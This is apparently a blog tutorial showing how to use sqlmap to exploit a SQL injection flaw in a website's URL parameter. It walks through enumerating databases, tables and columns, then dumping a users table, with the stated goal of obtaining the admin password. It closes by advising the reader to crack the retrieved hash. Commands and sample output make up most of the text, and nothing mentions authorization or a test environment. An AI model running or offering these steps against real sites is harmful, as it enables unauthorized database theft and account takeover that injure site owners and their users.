SQLmap is a wonderful tool for taking the dirty work out of your SQL Injection endeavors. Here is the quick and dirty on how to get that Admin Password.
Finding the Databases on the SQL Server
Once you confirm that a remote url is vulnerable to sql injection and is exploitable, the next step is to find out the names of the databases that exist on the remote system. The “–dbs” option is used to get the database list.
sqlmap -u “http://www.sitemap.com/section.php?id=51” –dbs
The output could be something like this
[*] starting at 12:12:56
[12:12:56] [INFO] resuming back-end DBMS ‘mysql’
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
—
Place: GET
Parameter: id
Type: error-based
Title: MySQL = 5.0 AND error-based – WHERE or HAVING clause
blah
blah
blah
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmeticsavailable databases [2]:
[*] information_schema
[*] safecosmetics
The output shows the existing databases on the remote system.
Find the Tables in a Particular Database
Now its time to find out what tables exist in a particular database. Lets say the database of interest over here is ‘safecosmetics’
Command:
sqlmap -u “http://www.site.com/section.php?id=51” –tables -D safecosmetics
and the output might be something similar to this:
[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
blah
blah
blah
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
blah blah blah more tables
isnt this amazing ? it is of course! Lets get the columns of a particular table now.
Get the Columns of One of the Tables
Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Lets say the table is ‘users’ and it contains the username and password.
sqlmap -u “http://www.site.com/section.php?id=51” –columns -D safecosmetics -T users
The output may be something like this:
[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
blah
blah
blah
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+——————-+————–+
| Column | Type |
+——————-+————–+
| email | text |
| hash | varchar(128) |
| id | int(11) |
| name | text |
| password | text |
| permission | tinyint(4) |
| system_allow_only | text |
| system_home | text |
+——————–+————–+
So now the columns are clearly visible. Good job!
Get Data from a Table
Now comes the most interesting part, of extracting the data from the table. The command would be
sqlmap -u “http://www.site.com/section.php?id=51” –dump -D safecosmetics -T users
The above command will simply dump the data of the particular table, very much like the mysqldump command.
The output might look similar to this
+–+—–+——-+——+———-+———–+—————+——————–+
| id | hash | name | email | password | permission | system_home | system_allow_only |
+–+—–+——-+——+———-+———–+—————+——————–+
| 1 | 5DIpzzDHFOwnCvPonu | admin | blank | blank | 3 | blank | blank |
+–+—–+——-+——+———-+———–+—————+——————–+
The hash column seems to have the password hash, or other times it will just have the password outright. Try cracking the hash and then you would get the login details rightaway. sqlmap will create a csv file containing the dump data for easy analysis.